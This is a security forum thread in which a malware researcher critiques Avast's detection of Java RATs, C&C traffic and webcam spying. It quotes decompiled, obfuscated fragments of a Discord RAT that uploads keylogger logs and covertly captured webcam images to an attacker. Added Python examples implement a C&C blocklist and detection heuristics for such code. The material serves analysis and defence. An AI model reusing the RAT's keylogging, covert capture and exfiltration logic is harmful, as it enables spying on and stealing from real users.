Avast WEBforum

Consumer Products => Avast Free Antivirus / Premium Security (legacy Pro Antivirus, Internet Security, Premier) => Topic started by: McMcBrad on December 01, 2020, 03:09:56 PM

Title: Avast/AVG Protection Feedback
Post by: McMcBrad on December 01, 2020, 03:09:56 PM
Hi,

I am a malware hunter and I've been experimenting with Avast recently.

It offers great malware protection, but I've noticed several glitches and areas of improvement:

Java Malware:
Avast is one of the few vendors blocking Java malware effectively, but real-time protection doesn't block *.jar files as soon as they are created. Unless you right-click-scan the item, malware gets blocked by IDP seconds after opening, even though there is a detection in definitions. This looks like a scanning glitch.

C&C Servers:
Avast hasn't developed technology that blocks connection to known C&C servers. Web Shield blocks dangerous downloads and phishing, but all other connections are allowed. This may be a great area of improvement.
I'm sure you have a database of known C&C servers and it won't be too hard for you to extract them from malware during analysis. It will boost your protection to unprecedented levels.

Correction:
There is an option for blocking known C&C servers in settings, but it doesn't look very effective. I tried many RATs connecting mainly to domains *.hopto.org, some of them months old and they are still not blocked.

Ransomware Protection:
It would've been great to be able to select different modes for different folders, instead of just selecting one mode in general.
Extracting domains from malware and analysing relationships on VT might be a good idea.

Webcam Protection:
I was experimenting with NJRAT (downloading pre-built servers) and several times I had attackers connected. They could turn on my webcam, so I suggest you download some RATs and test/fix this.

Scripts, fileless malware:
This is a bit of a hit and miss (tends to be effective with minor exceptions). I suggest you have a look at tools, such as Invoke-Obfuscation Master as well as maldocs and develop generic methods to block downloaders and droppers, especially when they abuse common Windows processes (wscript, cscript and others) and are obfuscated.

Removal:
I noticed sometimes removed malware remains in memory (that happened with NJRAT servers again). I think the way you terminate processes should be improved.
Otherwise, due to the IDP I believe, you have great correlation and remove malware in its entirety, unlike many others. I tested your ability to remove scheduled tasks with malicious PowerShell code and you did great.

Firewall:
Firewall doesn't seem to scan programs for viruses before allowing them to connect, as in my test it allowed threats for which it had a detection. It would be a good idea not to allow known malware to connect, as well as maybe a "hardened mode", where all untrusted executables are blocked from connecting.

As a side note, I sent you some pretty interesting samples days ago and they are still undetected. I sent you a JPHP Coinminer and Python Stealer, which I discovered myself. At the time of sending, it had a very low detection (only Kaspersky, ZoneAlarm indirectly and one more). I was expecting you to take it more seriously, but there is no detection to date.
It could've made a great article.
GData analyst already published an article on the samples I discovered: https://www.gdatasoftware.com/blog/icerat-evades-antivirus-by-using-jphp
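As an added example that is not part of the post and not Avast code, the two connection-policy ideas from the C&C and Firewall sections can be sketched as a host-based policy check: a suffix-matching blocklist stands in for a known-C&C database (the `*.hopto.org` entry mirrors the dynamic-DNS pattern the post mentions), and a "hardened mode" allows outbound connections only from an allowlist of trusted executables. The log format, the blocklist, the allowlist and the executable paths are all constructed for the example.

```python
"""Added example, not Avast code: the two connection-policy ideas from the
post, applied to constructed connection-log lines. A suffix-matching blocklist
stands in for a known-C&C database (the *.hopto.org entry mirrors the
dynamic-DNS pattern the post mentions), and a "hardened mode" allows outbound
connections only from an allowlist of trusted executables."""
from dataclasses import dataclass

# Constructed blocklist: exact hosts plus '*.suffix' wildcard entries.
C2_BLOCKLIST = ("c2.bad.example", "*.hopto.org")
# Constructed allowlist of executables permitted to connect in hardened mode.
TRUSTED_PROGRAMS = {
    r"C:\Windows\System32\svchost.exe",
    r"C:\Program Files\Mozilla Firefox\firefox.exe",
}


@dataclass
class Connection:
    process: str   # full path of the connecting executable
    host: str      # destination host name, lower-cased
    port: int


def parse_line(line):
    """Parse one tab-separated record: process<TAB>host<TAB>port (constructed format)."""
    process, host, port = line.rstrip("\n").split("\t")
    return Connection(process, host.strip().lower().rstrip("."), int(port))


def host_matches(host, pattern):
    """Exact match, or for '*.suffix' patterns a subdomain match: 'a.hopto.org'
    matches '*.hopto.org', while 'hopto.org' and 'nothopto.org' do not."""
    pattern = pattern.lower()
    if pattern.startswith("*."):
        suffix = pattern[1:]            # keep the leading dot: '.hopto.org'
        return host.endswith(suffix) and len(host) > len(suffix)
    return host == pattern


def evaluate(conn, hardened=False):
    """Return (verdict, reason). The C&C blocklist is checked first; hardened
    mode then rejects any process that is not on the trusted allowlist."""
    for pattern in C2_BLOCKLIST:
        if host_matches(conn.host, pattern):
            return "block", "destination matches C&C blocklist entry " + pattern
    if hardened and conn.process not in TRUSTED_PROGRAMS:
        return "block", "hardened mode: executable is not on the trusted allowlist"
    return "allow", "no policy matched"


def evaluate_log(lines, hardened=False):
    """Evaluate every log line; returns a list of (process, host, verdict, reason)."""
    results = []
    for conn in map(parse_line, lines):
        verdict, reason = evaluate(conn, hardened)
        results.append((conn.process, conn.host, verdict, reason))
    return results


# Constructed sample log: a browser, an unknown program in AppData talking to a
# dynamic-DNS host and to a CDN, and a system process reaching the bare
# hopto.org domain (not a subdomain, so not a blocklist hit).
SAMPLE_LOG = [
    "\t".join([r"C:\Program Files\Mozilla Firefox\firefox.exe", "www.example.com", "443"]),
    "\t".join([r"C:\Users\test\AppData\Roaming\update.exe", "myrat.hopto.org", "5552"]),
    "\t".join([r"C:\Users\test\AppData\Roaming\update.exe", "cdn.example.net", "443"]),
    "\t".join([r"C:\Windows\System32\svchost.exe", "hopto.org", "80"]),
]

if __name__ == "__main__":
    for mode in (False, True):
        print("hardened mode:", mode)
        for process, host, verdict, reason in evaluate_log(SAMPLE_LOG, hardened=mode):
            print(f"  {verdict:5} {host:18} {process}  ({reason})")
```

The suffix check deliberately requires a subdomain, so a wildcard entry for a dynamic-DNS provider does not block the provider's own site; in hardened mode the unknown AppData executable is refused even for a destination that no blocklist covers, which is the behaviour the Firewall section asks for.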
Title: Re: Avast/AVG Protection Feedback
Post by: schmidthouse on December 02, 2020, 12:06:51 AM
Well that's interesting enough.
Title: Re: Avast/AVG Protection Feedback
Post by: McMcBrad on December 02, 2020, 01:05:27 AM
Which statement do you find interesting?
Title: Re: Avast/AVG Protection Feedback
Post by: Asyn on December 03, 2020, 12:29:25 PM
Hi McMcBrad, welcome to the forum..!! :)

Just in case you need them, I'll add a few links...

• You can submit your feedback or a bug report in "About Avast". (Add a link to this thread)
• Submitting suggestions/ideas: https://forum.avast.com/index.php?topic=235975.0
• You can report a suspicious/malicious sample (File/Website) here: https://www.avast.com/report-malicious-file.php
• Avast Bug Bounty Program: https://www.avast.com/bug-bounty

PS: For the interested ones, see: https://malwaretips.com/threads/avast-premium-security-20-9.105149/
Title: Re: Avast/AVG Protection Feedback
Post by: McMcBrad on December 03, 2020, 08:36:30 PM
Using the link above I submitted a Java Discord RAT (at the time of sending, VT 1/58); almost 24 hours later, there is still no detection.
Although the C&C server is dead, I don't believe a program with the following code is safe.
Code:
FΑΚECRACKМЕΑААAAAΑАAА = new int[2];
        KeyLoggerModule.FΑΚECRACKМЕΑААAAAΑАAА[0] = ((String)((Object)Dispatcher.bootstrap("get", 9L))).length();
        KeyLoggerModule.FΑΚECRACKМЕΑААAAAΑАAА[1] = "".length();


while (true) {
                DiscordUtils.sendMessage((Color)Color.GREEN, (String)((String)Dispatcher.bootstrap("get", 98784247905L) + Initializer.instance.UID + (String)Dispatcher.bootstrap("get", 29L)), (String)"", null, (MessageReceivedEvent)var2_2);
                try {
                    var3_4 = new FileWriter(KeyLoggerHelper.logs);
                    var3_4.write(KeyLoggerHelper.text);
                    var3_4.close();

  var2_2.getChannel().sendFile(KeyLoggerHelper.logs, new AttachmentOption[KeyLoggerModule.FΑΚECRACKМЕΑААAAAΑАAА[1]]).queue();
Title: Re: Avast/AVG Protection Feedback
Post by: Asyn on December 04, 2020, 09:17:36 AM
Please use "Insert Code", else the post can get blocked or removed. Thanks

Code:
Example for code...

yada yada yada
Title: Re: Avast/AVG Protection Feedback
Post by: McMcBrad on December 04, 2020, 06:45:06 PM
Quote from: Asyn on December 04, 2020, 09:17:36 AM
Please use "Insert Code", else the post can get blocked or removed. Thanks

Code:
Example for code...

yada yada yada

Thank you and thanks for welcoming me to the forum.
Title: Re: Avast/AVG Protection Feedback
Post by: Asyn on December 05, 2020, 01:40:07 PM
No problem, always good to see new smart/interested guys around. :)
Title: Re: Avast/AVG Protection Feedback
Post by: Pondus on December 05, 2020, 07:33:12 PM
Quote from: McMcBrad on December 03, 2020, 08:36:30 PM
Using the link above I submitted a Java Discord RAT (at the time of sending, VT 1/58); almost 24 hours later, there is still no detection.
Although the C&C server is dead, I don't believe a program with the following code is safe.
No detection on that code

https://www.virustotal.com/gui/file/9f6f061e9fab24e89bae2069089cce43cc1338d347779ce4722b6b70246b566e/detection


Title: Re: Avast/AVG Protection Feedback
Post by: McMcBrad on December 05, 2020, 08:23:53 PM
Quote from: Pondus on December 05, 2020, 07:33:12 PM
Quote from: McMcBrad on December 03, 2020, 08:36:30 PM
Using the link above I submitted a Java Discord RAT (at the time of sending, VT 1/58); almost 24 hours later, there is still no detection.
Although the C&C server is dead, I don't believe a program with the following code is safe.
No detection on that code

https://www.virustotal.com/gui/file/9f6f061e9fab24e89bae2069089cce43cc1338d347779ce4722b6b70246b566e/detection

There can be no detection on that code, as I have taken it out of context.
It comes from a program with no visible window that imports the sarxos cam library and contains interesting modules you can see in the attachment.
This is the report of the program: https://www.virustotal.com/gui/file-analysis/MWM5N2UzOWU4OGJkZGZkY2UxZWIyNmE3OWYyYWEyNzM6MTYwNzE5NjIxMQ==/detection

The following code snippet saves a camera image (obviously without your knowledge, as again, there is no visible window) and sends it to an attacker via Discord:

Code:
  File file = new File(Initializer.instance.Dir, (String)((Object)Dispatcher.bootstrap("get", 201863462934L)));
        try {
            webcam = Webcam.getDefault();
            bl = webcam.isOpen();
        }
        catch (NullPointerException nullPointerException) {
            DiscordUtils.sendMessage((Color)Color.RED, (String)((String)((Object)Dispatcher.bootstrap("get", 201863462935L)) + Initializer.instance.UID + (String)((Object)Dispatcher.bootstrap("get", 29L))), (String)((Object)Dispatcher.bootstrap("get", 201863462936L)), null, (MessageReceivedEvent)messageReceivedEvent);
            return;
        }
        if (!bl) {
            if (error == null) {
                throw error;
            }
            webcam.open();
        }
        BufferedImage bufferedImage = webcam.getImage();
        boolean bl2 = webcam.isOpen();
        if (bl2) {
            if (error == null) {
                throw error;
            }
            webcam.close();
        }
        try {
            ImageIO.write((RenderedImage)bufferedImage, (String)((Object)Dispatcher.bootstrap("get", 90194313235L)), file);
        }
        catch (IOException iOException) {
            DiscordUtils.sendMessage((Color)Color.RED, (String)((String)((Object)Dispatcher.bootstrap("get", 201863462935L)) + Initializer.instance.UID + (String)((Object)Dispatcher.bootstrap("get", 29L))), (String)((Object)Dispatcher.bootstrap("get", 201863462937L)), null, (MessageReceivedEvent)messageReceivedEvent);
DiscordUtils.sendMessage((Color)Color.GREEN, (String)((String)((Object)Dispatcher.bootstrap("get", 201863462935L)) + Initializer.instance.UID + (String)((Object)Dispatcher.bootstrap("get", 29L))), (String)"", null, (MessageReceivedEvent)messageReceivedEvent);
        messageReceivedEvent.getChannel().sendFile(file, new AttachmentOption[FАKЕСRАCКМΕAAΑAAААΑΑΑ[1]]).queue();
        try {
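As an added example that is not part of this thread and not code from Avast or from the RAT, here is the kind of static triage heuristic an analyst can run over decompiled Java source to catch the combination the two snippets above show: webcam capture through the sarxos API, a Discord file upload, strings decoded at runtime through a dispatcher call, image or log files written to disk, and identifiers that mix Latin letters with look-alike Cyrillic or Greek letters (the snippets' `F...` array names). The indicator names, the weights and the three input snippets are constructed; only the call shapes follow what is visible in the decompiled code.

```python
"""Added example (not code from the thread or from Avast): a static triage
heuristic over decompiled Java source. It scores the combination of behaviours
the thread points out in the keylogger and webcam snippets: sarxos webcam
capture, Discord file upload, runtime string decoding through a dispatcher call,
image/log files written to disk, and identifiers that mix Latin letters with
look-alike Cyrillic or Greek letters. All input snippets are constructed."""
import re
import unicodedata

# (name, pattern, weight). Patterns follow the call shapes visible in the
# decompiled snippets; a single behaviour alone is not treated as malicious.
INDICATORS = [
    ("webcam_capture", re.compile(r"\bWebcam\.getDefault\(\)|\.getImage\(\)"), 3),
    ("discord_upload", re.compile(r"\.sendFile\(.*?\)\.queue\(\)"), 3),
    ("string_decoder", re.compile(r"Dispatcher\.bootstrap\(\"get\",\s*\d+L?\)"), 2),
    ("image_to_disk", re.compile(r"\bImageIO\.write\("), 1),
    ("log_file_write", re.compile(r"\bnew FileWriter\("), 1),
]
MIXED_SCRIPT_WEIGHT = 2
IDENT_RE = re.compile(r"[^\W\d]\w*")   # identifier-like tokens, Unicode-aware
SCRIPTS_OF_INTEREST = {"LATIN", "CYRILLIC", "GREEK"}


def scripts_in(identifier):
    """Set of script names (first word of the Unicode character name) for the
    letters of an identifier, e.g. {'LATIN', 'CYRILLIC'}."""
    return {unicodedata.name(ch, "").split(" ")[0]
            for ch in identifier if ch.isalpha()}


def mixed_script_identifiers(source):
    """Identifiers whose letters come from more than one of Latin, Cyrillic and
    Greek: a homoglyph obfuscation that survives decompilation."""
    found = []
    for match in IDENT_RE.finditer(source):
        ident = match.group(0)
        if len(scripts_in(ident) & SCRIPTS_OF_INTEREST) > 1 and ident not in found:
            found.append(ident)
    return found


def triage(source):
    """Count indicator hits, add the weights of the indicators present, and map
    the score to a verdict: clean (<3), review (3-5), suspicious (>=6)."""
    hits = {name: len(rx.findall(source)) for name, rx, _ in INDICATORS}
    score = sum(weight for name, _, weight in INDICATORS if hits[name])
    mixed = mixed_script_identifiers(source)
    if mixed:
        score += MIXED_SCRIPT_WEIGHT
    verdict = "suspicious" if score >= 6 else "review" if score >= 3 else "clean"
    return {"hits": hits, "mixed_script_identifiers": mixed,
            "score": score, "verdict": verdict}


# Constructed snippet in the shape of the RAT's webcam module. The identifier
# F\u0391KE\u041cODULE deliberately contains Greek Alpha and Cyrillic Em.
SUSPICIOUS_SNIPPET = """
    webcam = Webcam.getDefault();
    BufferedImage img = webcam.getImage();
    ImageIO.write(img, (String) Dispatcher.bootstrap("get", 90194313235L), file);
    event.getChannel().sendFile(file, new AttachmentOption[F\u0391KE\u041cODULE[1]]).queue();
"""
# Constructed benign programs: a plain text logger, and a local webcam viewer.
BENIGN_LOGGER = """
    FileWriter out = new FileWriter("app.log", true);
    out.write("started");
    out.close();
"""
BENIGN_CAMERA = """
    Webcam webcam = Webcam.getDefault();
    webcam.open();
    ImageIO.write(webcam.getImage(), "PNG", new File("snapshot.png"));
"""

if __name__ == "__main__":
    for label, src in [("suspicious", SUSPICIOUS_SNIPPET),
                       ("logger", BENIGN_LOGGER), ("camera", BENIGN_CAMERA)]:
        print(label, triage(src))
```

The scoring is deliberately additive: a local webcam viewer lands in "review" rather than "suspicious", and only the combination of capture, upload, runtime string decoding and homoglyph identifiers crosses the threshold, which is what separates the two snippets above from a legitimate sarxos application.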